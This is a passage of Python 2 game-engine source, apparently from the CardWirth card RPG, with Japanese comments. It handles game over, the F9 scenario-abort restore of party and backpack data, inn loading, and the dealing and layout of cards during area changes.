"""ゲームオーバー画面へ遷移。"""
cw.cwpy.advlog.gameover()
self.hide_party()
self.set_status("GameOver")
del self.pre_dialogs[:]
del self.pre_areaids[:]
self._gameover = False
self._forcegameover = False
self.battle = None
self.card_takenouttemporarily = None
self.clear_inputevents()
pygame.event.clear()
if self._need_disposition:
self.disposition_pcards()
del self.sdata.friendcards[:]
for music in self.music:
music.stop()
for i in xrange(len(self.lastsound_scenario)):
if self.lastsound_scenario[i]:
self.lastsound_scenario[i].stop(True)
self.lastsound_scenario[i] = None
self.ydata.losted_sdata = self.sdata
self.sdata = cw.data.SystemData()
if isinstance(self.sdata, cw.data.SystemData):
self.sdata.load_variables()
self.sdata.backlog = self.ydata.losted_sdata.backlog
self.update_titlebar()
self.statusbar.change()
self.change_area(1, nocheckvisible=True)
def set_gameoverstatus(self, gameover, force=True):
"""パーティの状態に係わらず
現状のゲームオーバー状態を設定する。
"""
self._gameover = gameover
if force:
self._forcegameover = gameover
def f9(self, load_failure=False, loadyado=False):
"""cw.data.ScenarioDataのf9()から呼び出され、
緊急避難処理の続きを行う。
"""
if load_failure == False and not self.is_playingscenario():
return
if self.sdata.in_endprocess:
return
self.clean_specials()
def func():
if cw.cwpy.is_runningevent():
self.exec_func(self._f9impl, False, loadyado)
raise cw.event.EffectBreakError()
else:
self._f9impl(False, loadyado)
self.exec_func(func)
def _f9impl(self, startotherscenario=False, loadyado=False):
if self.sdata.in_endprocess:
return
self.sdata.in_endprocess = True
self.advlog.f9()
self.sdata.is_playing = False
self.statusbar.change(False)
self.pre_dialogs = []
self.clear_inusecardimg()
self.clear_guardcardimg()
self.statusbar.change(False)
self.draw(clip=self.statusbar.rect)
self.return_takenoutcard(checkevent=False)
# 対象選択画面でF9しても、中止ボタンを宿まで持ち越さないように
self.selectedheader = None
# 特殊文字の辞書が変更されていたら、元に戻す
if self.rsrc.specialchars_is_changed:
self.rsrc.specialchars = self.rsrc.get_specialchars()
# battle
if self.battle and self.battle.is_running:
# バトルを強制終了
self.battle.end(True, True)
self.battle = None
# party copy
fname = os.path.basename(self.ydata.party.data.fpath)
dname = os.path.basename(os.path.dirname(self.ydata.party.data.fpath))
path = cw.util.join_paths(cw.tempdir, "ScenarioLog/Party", fname)
dstpath = cw.util.join_paths(self.ydata.tempdir, "Party", dname, fname)
dpath = os.path.dirname(dstpath)
if not os.path.isdir(dpath):
os.makedirs(dpath)
shutil.copy2(path, dstpath)
# member copy
dpath = cw.util.join_paths(cw.tempdir, u"ScenarioLog/Members")
for name in os.listdir(dpath):
path = cw.util.join_paths(dpath, name)
if os.path.isfile(path) and path.endswith(".xml"):
dstpath = cw.util.join_paths(self.ydata.tempdir,
"Adventurer", name)
dstdir = os.path.dirname(dstpath)
if not os.path.isdir(dstdir):
os.makedirs(dstdir)
shutil.copy2(path, dstpath)
# 復元を無効にする互換オプションが有効でなければ
# 追加されたゴシップ/終了印を削除し、削除されたゴシップ/終了印を追加し直す
if not cw.cwpy.setting.enable_oldf9:
# gossips
for key, value in self.sdata.gossips.iteritems():
if value:
self.ydata.remove_gossip(key)
else:
self.ydata.set_gossip(key)
# completestamps
for key, value in self.sdata.compstamps.iteritems():
if value:
self.ydata.remove_compstamp(key)
else:
self.ydata.set_compstamp(key)
# scenario
self.ydata.party.set_lastscenario([], u"")
# members
self.ydata.party.data = cw.data.yadoxml2etree(self.ydata.party.data.fpath)
self.ydata.party.reload()
# 荷物袋のデータを戻す
path = cw.util.join_paths(cw.tempdir, u"ScenarioLog/Backpack.xml")
etree = cw.data.xml2etree(path)
backpacktable = {}
yadodir = self.ydata.party.get_yadodir()
tempdir = self.ydata.party.get_tempdir()
for header in itertools.chain(self.ydata.party.backpack, self.ydata.party.backpack_moved):
if header.scenariocard:
header.contain_xml()
header.remove_importedmaterials()
continue
if header.fpath.lower().startswith("yado"):
fpath = cw.util.relpath(header.fpath, yadodir)
else:
fpath = cw.util.relpath(header.fpath, tempdir)
fpath = cw.util.join_paths(fpath)
backpacktable[fpath] = header
self.ydata.party.backpack = []
self.ydata.party.backpack_moved = []
for i, e in enumerate(etree.getfind(".")):
try:
header = backpacktable[e.text]
del backpacktable[e.text]
if header.moved <> 0:
# 削除フラグを除去、F9オプションが有効ならそのまま削除
# 荷物袋から移動された場合は使用されている
# 可能性があるので上書き
if header.carddata is None:
etree = cw.data.yadoxml2etree(header.fpath)
etree.remove("Property", attrname="moved")
etree.write_xml()
else:
etree = cw.data.yadoxml2etree(path=header.fpath)
etree.remove("Property", attrname="moved")
header2 = cw.header.CardHeader(carddata=etree.getroot())
header2.fpath = header.fpath
header2.write()
header = header2
header.moved = 0
self.ydata.party.backpack.append(header)
header.order = i
header.set_owner("BACKPACK")
# 荷物袋にある場合はcarddata無し、特殊技能の使用回数無し
header.carddata = None
if header.type == "SkillCard":
header.maxuselimit = 0
header.uselimit = 0
except Exception:
cw.util.print_ex()
# 一度荷物袋から取り出されてから戻された
# カードはbackpacktableに残る
for fpath, header in backpacktable.iteritems():
cw.cwpy.ydata.deletedpaths.add(header.fpath)
if not self.areaid >= 0:
self.areaid = self.pre_areaids[0][0]
# スプライトを作り直す
pcards = self.get_pcards()
showparty = bool(self.pcards)
if showparty:
for music in self.music:
music.stop()
logpath = cw.util.join_paths(cw.tempdir, u"ScenarioLog/Face/Log.xml")
if os.path.isfile(logpath):
elog = cw.data.xml2etree(logpath)
else:
elog = None
if loadyado and not self.is_showparty:
# シナリオ読込失敗で宿のロードと同時に帰還する場合に限り
# パーティ出現アニメーションを行う
status = "hidden"
else:
status = "normal"
for idx, data in enumerate(self.ydata.party.members):
if idx < len(pcards):
pcard = pcards[idx]
self.cardgrp.remove(pcard)
self.pcards.remove(pcard)
pos_noscale = (95 * idx + 9 * (idx + 1), 285)
pcard = cw.sprite.card.PlayerCard(data, pos_noscale=pos_noscale, status=status, index=idx)
# カード画像が変更されているPCは戻す
if not elog is None:
name = os.path.splitext(os.path.basename(data.fpath))[0]
for eimg in elog.getfind(".", raiseerror=False):
if eimg.get("member", "") == name:
prop = data.find("Property")
for ename in ("ImagePath", "ImagePaths"):
e = prop.find(ename)
if not e is None:
prop.remove(e)
if eimg.tag == "ImagePath":
# 旧バージョン(~0.12.3)
fname = eimg.get("path", "")
if fname:
face = cw.util.join_paths(cw.tempdir, u"ScenarioLog/Face", fname)
else:
face = ""
# 変更後のイメージを削除するためにここで再設定する
# (set_images()内で削除される)
prop.append(cw.data.make_element("ImagePath", eimg.text))
if os.path.isfile(face):
postype = eimg.get("positiontype", "Default")
pcard.set_images([cw.image.ImageInfo(face, postype=postype)])
else:
pcard.set_images([])
elif eimg.tag == "ImagePaths":
# 新バージョン(複数イメージ対応後)
seq = cw.image.get_imageinfos(eimg)
for info in seq:
info.path = cw.util.join_paths(cw.tempdir, u"ScenarioLog/Face", info.path)
# 変更後のイメージを削除するためにここで再設定する
# (set_images()内で削除される)
e = cw.data.make_element("ImagePaths")
prop.append(e)
for e2 in eimg:
if e2.tag == "NewImagePath":
e.append(cw.data.make_element("ImagePath", e2.text))
pcard.set_images(seq)
break
pcard.set_pos_noscale(pos_noscale)
pcard.set_fullrecovery()
pcard.update_image()
self.sdata.remove_log()
self.ydata.party._loading = False
if not self.is_showparty and not loadyado:
self._show_party()
self.background.clear_background()
for music in self.music:
music.stop()
for i in xrange(len(self.lastsound_scenario)):
if self.lastsound_scenario[i]:
self.lastsound_scenario[i].stop(True)
self.lastsound_scenario[i] = None
if self.lastsound_system:
self.lastsound_system.stop(False)
self.lastsound_system = None
if not startotherscenario:
self.set_yado()
def reload_yado(self):
"""現在の宿をロード。"""
# イベントを中止
self.event._stoped = True
self.event.breakwait = True
self.lock_menucards = True
del self.pre_dialogs[:]
del self.pre_areaids[:]
def return_title():
def func():
for i in xrange(len(self.lastsound_scenario)):
if self.lastsound_scenario[i]:
self.lastsound_scenario[i].stop(True)
self.lastsound_scenario[i] = None
self.set_status("Title")
self.sdata = cw.data.SystemData()
cw.util.remove_temp()
self.load_yado(self.yadodir, createmutex=False)
def func():
def func():
self.is_debuggerprocessing = False
if self.is_showingdebugger() and self.event:
self.event.refresh_tools()
self.frame.exec_func(func)
self.lock_menucards = False
self.exec_func(func)
self.exec_func(func)
def init_resources():
self.event.clear()
self._init_resources()
self.frame.exec_func(return_title)
def end_scenario():
# シナリオを強制終了
if self.ydata and self.ydata.losted_sdata:
self.ydata.losted_sdata.end(failure=True)
self.ydata.losted_sdata = None
elif self.is_playingscenario():
self.sdata.end(failure=True)
self.sdata.is_playing = False
self.exec_func(init_resources)
if self.is_decompressing:
raise cw.event.EffectBreakError()
def func1():
if self.is_showingmessage():
mwin = self.get_messagewindow()
mwin.result = cw.event.EffectBreakError()
self.event._stoped = True
elif self.is_runningevent():
self.event._stoped = True
# バトルを強制終了
if self.battle and self.battle.is_running:
self.battle.end(True, True)
self.exec_func(end_scenario)
self.exec_func(func1)
def load_yado(self, yadodir, createmutex=True):
"""指定されたディレクトリの宿をロード。"""
try:
return self._load_yado(yadodir, createmutex)
except Exception, ex:
cw.util.print_ex(file=sys.stderr)
cw.tempdir = cw.tempdir_init
self.yadodir = ""
self.tempdir = ""
self.setting.scenario_narrow = ""
self.setting.lastscenario = []
self.setting.lastscenariopath = ""
self.ydata = None
self.sdata = cw.data.SystemData()
raise ex
def _load_yado(self, yadodir, createmutex):
if createmutex:
if cw.util.create_mutex(u"Yado"):
if cw.util.create_mutex(yadodir):
try:
cw.tempdir = cw.util.join_paths(u"Data/Temp/Local", yadodir)
return self._load_yado2(yadodir)
finally:
cw.util.release_mutex(-2)
else:
cw.util.release_mutex()
cw.cwpy.play_sound("error")
return False
else:
cw.cwpy.play_sound("error")
return False
else:
return self._load_yado2(yadodir)
def _load_yado2(self, yadodir):
del self.pre_dialogs[:]
del self.pre_areaids[:]
optscenario = cw.OPTIONS.scenario
cw.OPTIONS.scenario = ""
yadodirname = os.path.basename(yadodir)
self.yadodir = yadodir.replace("\\", "/")
self.tempdir = self.yadodir.replace("Yado", cw.util.join_paths(cw.tempdir, u"Yado"), 1)
for music in self.music:
music.stop()
for i in xrange(len(self.lastsound_scenario)):
if self.lastsound_scenario[i]:
self.lastsound_scenario[i].stop(True)
self.lastsound_scenario[i] = None
if self.ydata and isinstance(self.sdata, cw.data.SystemData):
self.sdata.save_variables()
self.ydata = cw.data.YadoData(self.yadodir, self.tempdir)
self.setting.lastyado = yadodirname
self.setting.insert_yadoorder(yadodirname)
if self.ydata.party:
header = self.ydata.party.get_sceheader()
if optscenario:
if os.path.isabs(optscenario):
scedir = optscenario
else:
scedir = cw.cwpy.setting.get_scedir()
scedir = cw.util.join_paths(scedir, optscenario)
db = self.frame.open_scenariodb()
header2 = db.search_path(scedir)
if header2:
if header:
scepath1 = header.get_fpath()
scepath1 = os.path.normcase(os.path.normpath(os.path.abspath(scepath1)))
scepath2 = header2.get_fpath()
scepath2 = os.path.normcase(os.path.normpath(os.path.abspath(scepath2)))
if header and scepath1 <> scepath2:
self.sdata.set_log()
self.ydata.party.lastscenario = []
self.ydata.party.lastscenariopath = optscenario
self.setting.lastscenario = []
self.setting.lastscenariopath = optscenario
self._f9impl(startotherscenario=True)
else:
for idx, data in enumerate(self.ydata.party.members):
pos_noscale = (95 * idx + 9 * (idx + 1), 285)
pcard = cw.sprite.card.PlayerCard(data, pos_noscale=pos_noscale, status="normal", index=idx)
pcard.set_pos_noscale(pos_noscale)
pcard.set_fullrecovery()
pcard.update_image()
self.ydata.party._loading = False
self.ydata.party.lastscenario = []
self.ydata.party.lastscenariopath = optscenario
self.setting.lastscenario = []
self.setting.lastscenariopath = optscenario
self._show_party()
header = header2
# シナリオプレイ途中から再開
if header:
self.exec_func(self.set_scenario, header, resume=True)
# シナリオロードに失敗
elif self.ydata.party.is_adventuring():
self.play_sound("error")
s = (cw.cwpy.msgs["load_scenario_failure"])
self.call_modaldlg("YESNO", text=s)
if self.get_yesnoresult() == wx.ID_OK:
self.exec_func(self.sdata.set_log)
self.exec_func(self.f9, True, True)
else:
self.exec_func(self.ydata.load_party, None)
self.exec_func(self.set_yado)
else:
self.exec_func(self.set_yado)
if self.is_showingdebugger():
func = self.frame.debugger.refresh_tools
self.frame.exec_func(func)
else:
self.exec_func(self.set_yado)
self._clear_changed = True
return True
#-------------------------------------------------------------------------------
# エリアチェンジ関係メソッド
#-------------------------------------------------------------------------------
def deal_cards(self, quickdeal=False, updatelist=True, flag="", startbattle=False):
"""hidden状態のMenuCard(対応フラグがFalseだったら表示しない)と
PlayerCardを全て表示する。
quickdeal: 全カードを同時に表示する。
"""
if not (self.setting.quickdeal or self.setting.all_quickdeal):
quickdeal = False
self.force_dealspeed = -1
self._dealing = True
if self.is_autospread():
mcardsinv = self.get_mcards("invisible")
else:
mcardsinv = self.get_mcards("invisible", flag=flag)
# エネミーカードは初期化されていない場合がある
for mcard in mcardsinv[:]:
if isinstance(mcard, cw.sprite.card.EnemyCard):
if mcard.is_flagtrue():
if not mcard.initialize():
mcardsinv.remove(mcard)
# カード自動配置の配置位置を再設定する
if self.is_autospread():
mcards = self.get_mcards("flagtrue")
flag = bool(self.areaid == cw.AREA_CAMP and self.sdata.friendcards)
if self.is_battlestatus():
self.set_autospread(mcards, 6, flag, anime=False)
else:
self.set_autospread(mcards, 7, flag, anime=False)
deals = []
for mcard in mcardsinv:
if mcard.is_flagtrue():
self._fix_updateimage(mcard)
if quickdeal:
deals.append(mcard)
else:
cw.animation.animate_sprite(mcard, "deal")
if self.is_playingscenario() and self.sdata.in_f9:
# カード描画中にF9された場合はここへ来る
return
if deals and quickdeal:
cw.animation.animate_sprites(deals, "deal")
# list, indexセット
if updatelist:
self._update_mcardlist()
else:
self._after_update_mcardlist = True
self.input(True)
self._dealing = False
self.wait_showcards = False
def hide_cards(self, hideall=False, hideparty=True, quickhide=False, updatelist=True, flag=""):
"""
カードを非表示にする(表示中だったカードはhidden状態になる)。
各カードのhidecards()の最後に呼ばれる。
hideallがTrueだった場合、全てのカードを非表示にする。
"""
if not (self.setting.quickdeal or self.setting.all_quickdeal):
quickhide = False
self.force_dealspeed = -1
self._dealing = True
if updatelist:
# 選択を解除する
self.clear_selection()
# メニューカードを下げる
if self.is_autospread():
mcards = self.get_mcards("visible")
else:
mcards = self.get_mcards("visible", flag=flag)
hide = False
for mcard in mcards:
if hideall or not mcard.is_flagtrue():
self._fix_updateimage(mcard)
if mcard.inusecardimg:
self.clear_inusecardimg(mcard)
if quickhide:
hide = True
else:
cw.animation.animate_sprite(mcard, "hide")
if isinstance(mcard, cw.character.Character):
mcard.clear_action()
if hide:
cw.animation.animate_sprites(mcards, "hide")
# プレイヤカードを下げる
if self.ydata and hideparty:
if not self.ydata.party or self.ydata.party.is_loading():
self.draw(clip=self.statusbar.rect)
self.hide_party()
# list, indexセット
if updatelist:
self._update_mcardlist()
else:
self._after_update_mcardlist = True
self.input(True)
self._dealing = False
def _fix_updateimage(self, mcard):
if mcard.is_initialized():
if mcard.cardimg.use_excache:
mcard.cardimg.clear_cache()
mcard.cardimg.fix_pcimage_updated()
self.file_updates.discard(mcard)
mcard.cardimg.use_excache = False
def vanished_card(self, mcard):
"""mcardの対象消去を通知する。"""
if isinstance(mcard, (cw.sprite.card.MenuCard, cw.sprite.card.EnemyCard)) and mcard.flag:
seq = self._mcardtable.get(mcard.flag, [])
if seq and mcard in seq:
seq.remove(mcard)
if not seq:
del self._mcardtable[mcard.flag]
if isinstance(mcard, cw.sprite.card.PlayerCard):
self._need_disposition = True
self.update_mcardnames()
def update_mcardlist(self):
"""必要であればメニューカードのリストを更新する。
"""
if self._after_update_mcardlist:
self._update_mcardlist()
def _update_mcardlist(self):
self._mcardtable = {}
mcards = self.get_mcards()
visible = []
for mcard in mcards:
if mcard.status <> "hidden":
visible.append(mcard)
if mcard.flag:
seq = self._mcardtable.get(mcard.flag, [])
seq.append(mcard)
if len(seq) == 1:
self._mcardtable[mcard.flag] = seq
if not self.is_showingmessage():
self.list = visible
self.index = -1
def update_pcimage(self, pcnumber, deal):
if not self.file_updates_bg or deal:
for bgtype, d in self.background.bgs:
if bgtype == cw.sprite.background.BG_PC:
bgpcnumber = d[0]
if bgpcnumber == pcnumber:
if deal:
self.background.reload(False)
else:
self.file_updates_bg = True
break
updates = []
pcards = self.get_pcards()
pcard = pcards[pcnumber-1] if pcnumber-1 < len(pcards) else None
for mcard in self.get_mcards():
if not mcard.is_initialized():
continue
imgpaths = []
can_loaded_scaledimages = []
can_loaded_scaledimage = pcard.data.getbool(".", "scaledimage", False) if pcard else True
update = False
if isinstance(mcard.cardimg, cw.image.CharacterCardImage) and mcard.cardimg.is_override_image:
cardimg_paths = mcard.cardimg.override_images[0]
cardimg_can_loaded_scaledimage = mcard.cardimg.override_images[1]
else:
cardimg_paths = mcard.cardimg.paths
cardimg_can_loaded_scaledimage = mcard.cardimg.can_loaded_scaledimage
for i, info in enumerate(cardimg_paths):
# PC画像を更新
if info.pcnumber == pcnumber:
if pcard:
for base in pcard.imgpaths:
imgpaths.append(cw.image.ImageInfo(base.path, pcnumber, info.base, basecardtype="LargeCard"))
can_loaded_scaledimages.append(can_loaded_scaledimage)
else:
imgpaths.append(cw.image.ImageInfo(pcnumber=pcnumber, base=info.base, basecardtype="LargeCard"))
can_loaded_scaledimages.append(False)
update = True
else:
imgpaths.append(info)
if isinstance(cardimg_can_loaded_scaledimage, (list, tuple)):
can_loaded_scaledimages.append(cardimg_can_loaded_scaledimage[i])
else:
assert isinstance(cardimg_can_loaded_scaledimage, bool)
can_loaded_scaledimages.append(cardimg_can_loaded_scaledimage)
if not update:
continue
if isinstance(mcard.cardimg, cw.image.CharacterCardImage) and mcard.cardimg.is_override_image:
mcard.cardimg.override_images_upd = (imgpaths, can_loaded_scaledimages)
else:
mcard.cardimg.paths_upd = imgpaths
mcard.cardimg.can_loaded_scaledimage_upd = can_loaded_scaledimages
if deal:
mcard.cardimg.fix_pcimage_updated()
mcard.cardimg.clear_cache()
updates.append(mcard)
if deal:
if cw.cwpy.setting.all_quickdeal:
force_dealspeed = self.force_dealspeed
self.force_dealspeed = self.setting.dealspeed if self.setting.quickdeal else -1
try:
cw.animation.animate_sprites(updates, "hide")
for mcard in updates:
mcard.update_image()
cw.animation.animate_sprites(updates, "deal")
finally:
self.force_dealspeed = force_dealspeed
else:
for mcard in updates:
cw.animation.animate_sprite(mcard, "hide")
mcard.update_image()
cw.animation.animate_sprite(mcard, "deal")
if cw.cwpy.background.has_jpdcimage:
cw.cwpy.file_updates_bg = True
return updates
def show_party(self):
"""非表示のPlayerCardを再表示にする。"""
pcards = [i for i in self.get_pcards() if i.status == "hidden"]
if pcards:
seq = []
for pcard in pcards:
if pcard.inusecardimg and not pcard.inusecardimg.center:
seq.append(pcard.inusecardimg)
cw.animation.animate_sprites(pcards + seq, "shiftup")
self._show_party()
def _show_party(self):
if self.ydata and self.ydata.party and not self.ydata.party.is_loading():
self.is_showparty = True
self.input(True)
self.event.refresh_showpartytools()
def hide_party(self):
"""PlayerCardを非表示にする。"""
pcards = [i for i in self.get_pcards() if not i.status == "hidden"]
if pcards:
seq = []
for pcard in pcards:
if pcard.inusecardimg and not pcard.inusecardimg.center:
seq.append(pcard.inusecardimg)
cw.animation.animate_sprites(pcards + seq, "shiftdown")
self.is_showparty = False
self.selection = None
self.input(True)
self.event.refresh_showpartytools()
def set_pcards(self):
# プレイヤカードスプライト作成
if self.ydata and self.ydata.party and not self.get_pcards():
for idx, e in enumerate(self.ydata.party.members):
pos_noscale = 95 * idx + 9 * (idx + 1), 285
cw.sprite.card.PlayerCard(e, pos_noscale=pos_noscale, index=idx)
# 番号クーポン設定
self.ydata.party._loading = False
def set_sprites(self, dealanime=True,
bginhrt=False, ttype=("Default", "Default"),
doanime=True, data=None,
nocheckvisible=False):
"""エリアにスプライトをセットする。
bginhrt: Trueの時は背景継承。
"""
# メニューカードスプライトグループの中身を削除
self.cardgrp.remove(self.mcards)
self.mcards = []
self.mcards_expandspchars.clear()
self.file_updates.clear()
# プレイヤカードスプライトグループの中身を削除
if self.ydata:
if not self.ydata.party or self.ydata.party.is_loading():
self.cardgrp.remove(self.pcards)
self.pcards = []
# 背景スプライト作成
if not bginhrt:
try:
self.background.load(self.sdata.get_bgdata(), doanime, ttype, nocheckvisible=nocheckvisible)
except cw.event.EffectBreakError:
# JPY1の処理がF9等で中止された
assert doanime
return
# 特殊エリア(キャンプ・メンバー解散)だったら背景にカーテンを追加。
if self.areaid in (cw.AREA_CAMP, cw.AREA_BREAKUP):
self.set_curtain(curtain_all=True)
# メニューカードスプライト作成
self.set_mcards(self.sdata.get_mcarddata(data=data), dealanime)
# プレイヤカードスプライト作成
self.set_pcards()
# キャンプ画面のときはFriendCardもスプライトグループに追加
if self.areaid == cw.AREA_CAMP:
self.add_fcardsprites(status="hidden")
def add_fcardsprites(self, status, alpha=None):
"""cardgrpに同行NPCのスプライトを追加する。"""
seq = list(enumerate(self.get_fcards()))
for index, fcard in reversed(seq):
index = 5 - index
pos = (95 * index + 9 * (index + 1), 5)
fcard.set_pos_noscale(pos)
fcard.status = status
fcard.set_alpha(alpha)
self.add_lazydraw(clip=fcard.rect)
if fcard.status == "hidden":
fcard.clear_image()
self.cardgrp.add(fcard, layer=fcard.layer_t)
self.mcards.append(fcard)
else:
self.cardgrp.add(fcard, layer=fcard.layer_t)
self.mcards.append(fcard)
if not alpha is None:
fcard.update_image()
fcard.deal()
self.list = self.get_mcards("visible")
self.index = -1
def clear_fcardsprites(self):
"""cardgrpから同行NPCのスプライトを取り除く。"""
fcards = []
for fcard in self.mcards[:]:
if isinstance(fcard, cw.character.Friend):
fcard.set_alpha(None)
fcard.hide()
fcard.layer = (cw.LAYER_FCARDS, cw.LTYPE_FCARDS, fcard.index, 0)
fcards.append(fcard)
self.mcards.remove(fcard)
self.mcards_expandspchars.discard(fcard)
self.add_lazydraw(clip=fcard.rect)
self.cardgrp.remove(fcards)
self.list = self.get_mcards("visible")
self.index = -1
def update_mcardnames(self):
for mcard in self.mcards_expandspchars:
if mcard.is_initialized():
name = mcard.name
mcard.update_name()
if mcard.name != name:
self.add_lazydraw(mcard.rect)
self.set_lazydraw()
def set_autospread(self, mcards, maxcol, campwithfriend=False, anime=False):
"""自動整列設定時のメニューカードの配置位置を設定する。
mcards: MenuCard or EnemyCardのリスト。
maxcol: この値を超えると改行する。
campwithfriend: キャンプ画面時&FriendCardが存在しているかどうか。
anime: カードを一旦消去してから再配置するならTrue。
"""
def get_size_noscale(mcard):
assert hasattr(mcard, "cardimg")
if isinstance(mcard.cardimg, cw.image.CharacterCardImage) or\
isinstance(mcard.cardimg, cw.image.LargeCardImage):
return cw.setting.get_resourcesize("CardBg/LARGE")
elif isinstance(mcard.cardimg, cw.image.CardImage):
return cw.setting.get_resourcesize("CardBg/NORMAL")
else:
assert False
def set_mcardpos_noscale(mcards, (maxw, maxh), y):
n = maxw + 5
x = (632 - n * len(mcards) + 5) / 2
grpidx = {}
for mcard in mcards:
if mcard.cardgroup:
gi = grpidx.get(mcard.cardgroup, 0)
# カード再配置の対象になっている場合は整列しない
if not mcard.cardgroup or not (mcard.cardgroup, gi) in self.sdata.moved_mcards:
w, h = get_size_noscale(mcard)
if mcard.scale <> 100:
mcard.set_scale(100)
mcard.set_pos_noscale((x + maxw - w, y + maxh - h))
if mcard.cardgroup:
grpidx[(mcard.cardgroup, gi)] = gi + 1
x += n
maxw = 0
maxh = 0
for mcard in mcards:
w, h = get_size_noscale(mcard)
maxw = max(w, maxw)
maxh = max(h, maxh)
if anime:
cw.animation.animate_sprite(mcard, "hide")
n = len(mcards)
if campwithfriend:
y = (145 - maxh) / 2 + 140 - 2
set_mcardpos_noscale(mcards, (maxw, maxh), y)
elif n <= maxcol:
y = (285 - maxh) / 2 - 2
set_mcardpos_noscale(mcards, (maxw, maxh), y)
else:
y = (285 - 10 - maxh * 2) / 2
y2 = y + maxh + 5
p = n / 2 + n % 2
set_mcardpos_noscale(mcards[:p], (maxw, maxh), y)
set_mcardpos_noscale(mcards[p:], (maxw, maxh), y2)
if anime:
for mcard in mcards:
cw.animation.animate_sprite(mcard, "deal")
if self.battle:
self.battle.numenemy = len(cw.cwpy.get_mcards("flagtrue"))
def set_mcards(self, (stype, elements), dealanime=True, addgroup=True, setautospread=True):
"""メニューカードスプライトを構成する。
生成されたカードのlistを返す。
(stype, elements): (spreadtype, MenuCardElementのリスト)のタプル
dealanime: True時はカードを最初から表示している。
addgroup: True時は現在の画面に即時反映する。
"""
# カードの並びがAutoの時
if stype == "Auto":
autospread = True
else:
autospread = False
if setautospread:
self._autospread = autospread
status = "hidden" if dealanime else "normal"
seq = []
grpidx = {}
moved_mcards = {} # 不要な再配置情報を削除するため再構築する
for i, e in enumerate(elements):
cardgroup = e.gettext("Property/CardGroup", "")
if stype == "Auto":
pos_noscale = (0, 0)
else:
left = e.getint("Property/Location", "left")
top = e.getint("Property/Location", "top")
pos_noscale = (left, top)
status2 = status
if status2 <> "hidden":
if not cw.sprite.card.CWPyCard.is_flagtrue_static(e):
status2 = "hidden"
if cardgroup:
gi = grpidx.get(cardgroup, 0)
moveddata = self.sdata.moved_mcards.get((cardgroup, gi), None)
else:
moveddata = None
if e.tag == "EnemyCard":
if self.sdata.get_castname(e.getint("Property/Id", -1)) is None:
continue
mcard = cw.sprite.card.EnemyCard(e, pos_noscale, status2, addgroup, i,
moveddata=moveddata)
else:
mcard = cw.sprite.card.MenuCard(e, pos_noscale, status2, addgroup, i,
moveddata=moveddata)
if not mcard.is_flagtrue():
mcard.status = "hidden"
if cardgroup:
if moveddata:
moved_mcards[(cardgroup, gi)] = moveddata
grpidx[cardgroup] = gi + 1
seq.append(mcard)
if 0 <= self.areaid:
self.sdata.moved_mcards = moved_mcards
return seq
def disposition_pcards(self):
"""プレイヤーカードの位置を補正する。
対象消去が発生した場合や解散直後に適用。
"""
if self.ydata and self.ydata.party:
# キャンセル可能な対象消去状態だったメンバを完全に消去する(互換動作)
for pcard in self.ydata.party.vanished_pcards:
pcard.commit_vanish()
self.ydata.party.vanished_pcards = []
for index, pcard in enumerate(self.get_pcards()):
x = 9 + 95 * index + 9 * index
y = pcard._pos_noscale[1]
pcard.get_baserect()[0] = cw.s(x)
y2 = pcard.rect.top
size = pcard.rect.size
baserect = pcard.get_baserect()
if pcard.rect.size == (0, 0):
pcard.rect.size = baserect.size
pcard.rect.center = baserect.center
pcard.rect.top = y2
pcard.cardimg.rect[0] = cw.s(x)
pcard._pos_noscale = (x, y)
pcard.rect.size = size
for i, t in enumerate(pcard.zoomimgs):
img, rect = t
rect.center = pcard.rect.center
pcard.zoomimgs[i] = (img, rect)
pcard.index = index
self._need_disposition = False
def change_area(self, areaid, eventstarting=True,
bginhrt=False, ttype=("Default", "Default"),
quickdeal=False, specialarea=False, startbattle=False,
doanime=True, data=None, nocheckvisible=False, resume=False,
force_updatebg=False):
"""ゲームエリアチェンジ。
eventstarting: Falseならエリアイベントは起動しない。
bginhrt: 背景継承を行うかどうかのbool値。
ttype: トランジション効果のデータのタプル((効果名, 速度))
"""
if self.ydata and not self.is_playingscenario():
oldchanged = self.ydata.is_changed()
else:
oldchanged = True
# 宿にいる時は常に高速切替有効
force_dealspeed = self.force_dealspeed
if self.setting.all_quickdeal and not self.is_playingscenario():
quickdeal = True
self.force_dealspeed = self.setting.dealspeed if self.setting.quickdeal else -1
# デバッガ等で強制的にエリア移動するときは特殊エリアを解除する
if not specialarea:
self.clean_specials()
# 背景継承を行うかどうかのbool値
bginhrt |= bool(self.areaid < 0 and self.areaid <> cw.AREA_BREAKUP)
bginhrt &= not force_updatebg
oldareaid = self.areaid
self.areaid = areaid
if 0 <= oldareaid and 0 <= self.areaid:
# カード再配置情報を破棄
self.moved_mcards = {}
if not self.sdata.change_data(areaid, data=data):
raise cw.event.EffectBreakError()
bginhrt |= bool(self.areaid < 0)
bginhrt &= not force_updatebg
self.hide_cards(True, quickhide=quickdeal)
self.set_sprites(bginhrt=bginhrt, ttype=ttype, doanime=doanime, data=data,
nocheckvisible=nocheckvisible)
if not self.is_playingscenario() and not self.is_showparty and self.status != "GameOver":
# 宿にいる場合は常に全回復状態にする
for pcard in self.get_pcards():
pcard.set_fullrecovery()
pcard.update_image()
if not self.is_playingscenario():
self.disposition_pcards()
if 0 <= oldareaid and self.ydata and self.is_playingscenario():
self.ydata.changed()
#冒険の再開のみ先にPCをアニメーションさせる
if resume:
self.show_party()
# エリアイベントを開始(特殊エリアからの帰還だったら開始しない)
if eventstarting and oldareaid >= 0:
if not self.wait_showcards:
self.deal_cards(quickdeal=quickdeal, startbattle=startbattle)
else:
self.draw()
self.force_dealspeed = force_dealspeed
if self.is_playingscenario() and self.sdata.in_f9:
# カード描画中にF9された場合はここへ来る
return
if self.areaid >= 0 and self.status == "Scenario":
self.elapse_time()
if self._need_disposition:
self.disposition_pcards()
self.draw()
self.sdata.start_event(keynum=1)
else:
self.deal_cards(quickdeal=quickdeal, startbattle=startbattle)
self.force_dealspeed = force_dealspeed
if not startbattle and not pygame.event.peek(pygame.locals.USEREVENT):
self.show_party()
if self._need_disposition:
self.disposition_pcards()
self.draw()
if self.ydata and not self.is_playingscenario():
self.ydata._changed = oldchanged
def change_battlearea(self, areaid):
"""
指定するIDの戦闘を開始する。
"""
data = self.sdata.get_resdata(True, areaid)
if data is None:
raise cw.event.EffectBreakError()
# 対象選択中であれば中止
self.lock_menucards = True
self.clean_specials()
self.play_sound("battle", from_scenario=True, material_override=True)
self.statusbar.change(False, encounter=True)
path = data.gettext("Property/MusicPath", "")
volume = data.getint("Property/MusicPath", "volume", 100)
loopcount = data.getint("Property/MusicPath", "loopcount", 0)
channel = data.getint("Property/MusicPath", "channel", 0)
